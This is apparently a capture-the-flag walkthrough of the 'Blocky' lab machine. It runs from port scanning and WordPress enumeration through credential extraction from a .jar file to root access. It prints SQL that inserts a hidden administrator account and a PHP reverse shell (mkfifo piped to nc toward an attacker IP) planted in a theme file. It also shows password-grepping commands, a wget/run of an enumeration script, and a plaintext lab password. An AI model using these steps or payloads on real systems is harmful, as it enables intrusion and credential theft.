We pick Blocky from the list:


We start with a usual nmap scan:

nmap -sV -T3 -A -p-

While it runs we can test to see if it is running a standard port web server at We get a Minecraft-themed WordPress page:



We can start a wpscan while we look around.

wpscan -e u --url

While that runs we get our nmap scan results:

Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-19 21:47 EDT
Nmap scan report for
Host is up (0.15s latency).
Not shown: 65530 filtered ports
21/tcp    open   ftp       ProFTPD 1.3.5a
22/tcp    open   ssh       OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
|   256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_  256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp    open   http      Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: BlockyCraft – Under Construction!
8192/tcp  closed sophos
25565/tcp open   minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Aggressive OS guesses: Linux 3.10 - 4.11 (94%), Linux 3.2 - 4.9 (91%), Linux 3.13 (90%), Linux 3.13 or 4.2 (90%), Linux 4.10 (90%), Linux 4.2 (90%), Linux 4.4 (90%), Asus RT-AC66U WAP (90%), Linux 3.10 (90%), Linux 3.11 - 3.12 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8192/tcp)
1   163.23 ms
2   166.04 ms

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 435.29 seconds

It looks like it really is running Minecraft on it. My guess is we may have some credentials on some config files somewhere so we can run a directory scan.

dirb -i

When we check out our finished wpscan, we get some vulnerabilities as well as a user notch.


We can run wpscan again against the user account and see if we can crack it. If it works for WordPress they may have the same password for their system account so we can connect via ssh with.

wpscan -U notch -P rockyou.txt --password-attack wp-login --url

From the directory scans we see a few other custom ones that are not default to WordPress:


When we browse to we can see some .jar files.

Let’s download the files:


We can try and decompile or open the .jar file:

apt -y install jd-gui

We can select the BlockyCore.jar file.

Upon opening the class we can see the login credentials for their Minecraft server database.

Here, we are hoping that they reuse their password for their WP site. I attempted notch: but it was unsuccessful.

Then from our dirb scan we did have a phpmyadmin page. So for sure we can log into that now.


Once logged in we could attempt to look for vulnerabilities but an easier way could be to get in through the WordPress way. Most leave their text editor permissions open, so there we could setup a reverse shell.

Let’s make sure first we can log into the phpmyadmin portal:

And it works.

Okay, so now we have two options. We could reset the notch user’s password or as my preference, add a new admin user.

On the right panel:

  • expand wordpress
  • click wp_users
  • click insert
  • fill in fields
    • select MD5 for function for password

Then insert into wp_usermeta:


Generated inserted code:

INSERT INTO `wp_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES (3, 'admin', MD5('enterpassword10'), 'admin', 'admin@blocky.htb', '', '2019-11-28 00:00:00', '', '0', '');

INSERT INTO `wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '3', 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}');

INSERT INTO `wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '3', 'wp_user_level', '10');

Once we have the admin user created, we can go to the WordPress login:


Great. Once signed in go to Appearance->Theme Editor.

Then click on a partial .php page. We could try to be more stealthy by making our shell only work on an admin section:

$a_user = wp_get_current_user();
if (user_can( $a_user, 'administrator' )) {
  exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.XXX.XXX 4444 >/tmp/f");

Setup the event listener:

nc -lvp 4444

We got a shell.

Privilege Escalation

We can start enumerating the machine now. We can do this manually or we can run the linux enum script.

Download the script:

wget -O enum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

Start a webserver to transfer the file:

python -m SimpleHTTPServer 999

On the remote shell we can download it off our local machine:

wget http://10.10.XX.XX:999/enum.sh

Set execute permissions then run:

chmod +x enum.sh && ./enum.sh

We can dig through some files. One of which we can see their WordPress setup:

cat /var/www/html/wp-config.php

We can do a directory

grep -rl password / 2> /dev/null

This brings back some files.

cat /home/notch/minecraft/config/sponge/global.conf

This made me think if notch reused the same password.

ssh notch@

Use root mysql password: 8YsqfCTnvxAUeduzjNSXe22


We first check the user info:

Cool, so notch is already a sudoer.

sudo -s

Time to get the root file:

cat /root/root.txt